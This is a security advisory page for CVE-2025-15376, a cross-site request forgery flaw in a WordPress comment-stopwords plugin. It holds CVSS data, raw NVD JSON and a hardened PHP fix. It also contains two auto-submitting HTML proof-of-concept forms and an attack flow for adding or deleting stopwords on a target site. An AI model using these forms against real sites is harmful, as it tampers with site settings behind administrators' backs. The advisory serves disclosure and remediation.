Security Vulnerability Report
CVE-2025-15376 CVSS 4.3 MEDIUM

CVE-2025-15376

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42

Description

The Stopwords for comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the 'set_stopwords_for_comments' and 'delete_stopwords_for_comments' functions. This makes it possible for unauthenticated attackers to add or delete stopwords via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data is available in the NVD record; the affected product and versions, as stated in the description, are:

Stopwords for comments <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2025-15376 -->
<!-- This PoC demonstrates adding a stopword -->
<html>
<body>
<form action="http://target-site.com/wp-admin/admin-post.php" method="POST">
  <input type="hidden" name="action" value="set_stopwords_for_comments" />
  <input type="hidden" name="stopwords" value="malicious_word" />
  <input type="hidden" name="nonce" value="" />
  <input type="submit" value="Submit" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>
```

```html
<!-- CSRF PoC for deleting stopwords -->
<html>
<body>
<form action="http://target-site.com/wp-admin/admin-post.php" method="POST">
  <input type="hidden" name="action" value="delete_stopwords_for_comments" />
  <input type="hidden" name="stopwords" value="allowed_word" />
  <input type="submit" value="Submit" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>
<!-- Attack flow:
  1. Attacker creates malicious page with CSRF PoC
  2. Tricks administrator into visiting the page
  3. Browser automatically sends request with admin cookies
  4. Server processes request without verifying nonce
  5. Stopwords are modified as attacker intended
-->
```
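The root cause named in the description is that the two admin-post handlers write stopwords without checking a WordPress nonce, so a POST originating from any page the administrator's browser visits is accepted. The following PHP is an added example of the hardened pattern; it is not the plugin's own code (which this page does not reproduce), and the function names, the `sfc_stopwords` option name, the `sfc_manage_stopwords` nonce action, the `sfc_nonce` field name and the `manage_options` capability are all assumptions. The WordPress API calls themselves (`wp_nonce_field`, `check_admin_referer`, `current_user_can`, `admin_post_*` hooks) are real.

```php
<?php
/*
 * Hypothetical hardened admin-post handlers for the two action names in the
 * advisory. Added example, not the plugin's code: option name, nonce action,
 * field name and capability are assumptions.
 */

// Settings form. wp_nonce_field() emits a hidden token bound to this action
// and to the logged-in user's session, so a page hosted on another origin
// cannot know a valid value to put in the forged POST.
function sfc_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'sfc_manage_stopwords', 'sfc_nonce' ); ?>
        <input type="hidden" name="action" value="set_stopwords_for_comments" />
        <input type="text" name="stopwords" value="" />
        <?php submit_button( 'Save stopwords' ); ?>
    </form>
    <?php
}

// Shared guard run before any write. check_admin_referer() calls wp_die() when
// the nonce is missing, empty or invalid; the capability check then rejects
// logged-in users who are not allowed to manage settings.
function sfc_authorize_request() {
    check_admin_referer( 'sfc_manage_stopwords', 'sfc_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'sfc' ), '', array( 'response' => 403 ) );
    }
}

// Normalizes a comma-separated input into a list of unique, sanitized words.
function sfc_parse_words( $raw ) {
    $words = array_map( 'trim', explode( ',', sanitize_text_field( wp_unslash( $raw ) ) ) );
    return array_values( array_unique( array_filter( $words ) ) );
}

function sfc_handle_set_stopwords() {
    sfc_authorize_request();
    $existing = (array) get_option( 'sfc_stopwords', array() );
    $new      = sfc_parse_words( isset( $_POST['stopwords'] ) ? $_POST['stopwords'] : '' );
    update_option( 'sfc_stopwords', array_values( array_unique( array_merge( $existing, $new ) ) ) );
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'options-general.php' ) ) );
    exit;
}

function sfc_handle_delete_stopwords() {
    sfc_authorize_request();
    $existing = (array) get_option( 'sfc_stopwords', array() );
    $remove   = sfc_parse_words( isset( $_POST['stopwords'] ) ? $_POST['stopwords'] : '' );
    update_option( 'sfc_stopwords', array_values( array_diff( $existing, $remove ) ) );
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'options-general.php' ) ) );
    exit;
}

// Only the logged-in admin_post_{action} hooks are registered; the
// admin_post_nopriv_{action} variants are deliberately left unhooked so
// unauthenticated callers receive nothing.
add_action( 'admin_post_set_stopwords_for_comments', 'sfc_handle_set_stopwords' );
add_action( 'admin_post_delete_stopwords_for_comments', 'sfc_handle_delete_stopwords' );
```

With this guard in place, the forged forms above fail at `check_admin_referer()`: the first sends an empty `nonce` value under the wrong field name and the second sends none, and even a correctly named field cannot carry a token that was never issued to the attacker. When auditing a plugin for this class of bug, the check is that every `admin_post_*` and `wp_ajax_*` callback that changes state calls `check_admin_referer()` or `wp_verify_nonce()` plus a capability check before the write, and that the corresponding form is rendered with `wp_nonce_field()`.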

References

https://plugins.trac.wordpress.org/browser/stopwords-for-comments/trunk/functions.php?marks=151,170#L151
https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8c45c7-dbb2-46ab-8e50-e02062587b00?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-15376", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:13.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Stopwords for comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the 'set_stopwords_for_comments' and 'delete_stopwords_for_comments' functions. This makes it possible for unauthenticated attackers to add or delete stopwords via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Stopwords for comments para WordPress es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta la 1.1, inclusive. Esto se debe a la falta de validación de nonce en las funciones 'set_stopwords_for_comments' y 'delete_stopwords_for_comments'. Esto hace posible que atacantes no autenticados añadan o eliminen stopwords a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/stopwords-for-comments/trunk/functions.php?marks=151,170#L151", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8c45c7-dbb2-46ab-8e50-e02062587b00?source=cve", "source": "[email protected]"}]}}
```